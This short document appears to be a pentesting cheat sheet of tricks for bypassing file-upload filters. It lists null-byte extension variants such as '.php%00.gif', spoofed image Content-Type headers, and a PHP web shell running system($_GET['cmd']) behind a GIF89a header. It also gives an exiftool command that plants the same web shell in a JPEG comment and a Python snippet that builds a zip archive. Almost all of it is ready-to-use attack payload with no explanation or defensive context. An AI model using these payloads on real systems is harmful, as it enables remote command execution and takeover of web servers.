Tricks
- .php%00.gif
- .php\x00.gif
- .php%00.png
- .php\x00.png
- .php%00.jpg
- .php\x00.jpg
Content-Type : image/gif
Content-Type : image/png
Content-Type : image/jpeg
GIF89a;
<?
system($_GET['cmd']);
?>
exiftool -Comment='<?php system($_GET['cmd']); ?>' photo.jpg
from zipfile import ZipFile
zip = ZipFile("test.zip", "w")
zip.writestr("path", "content")
zip.close()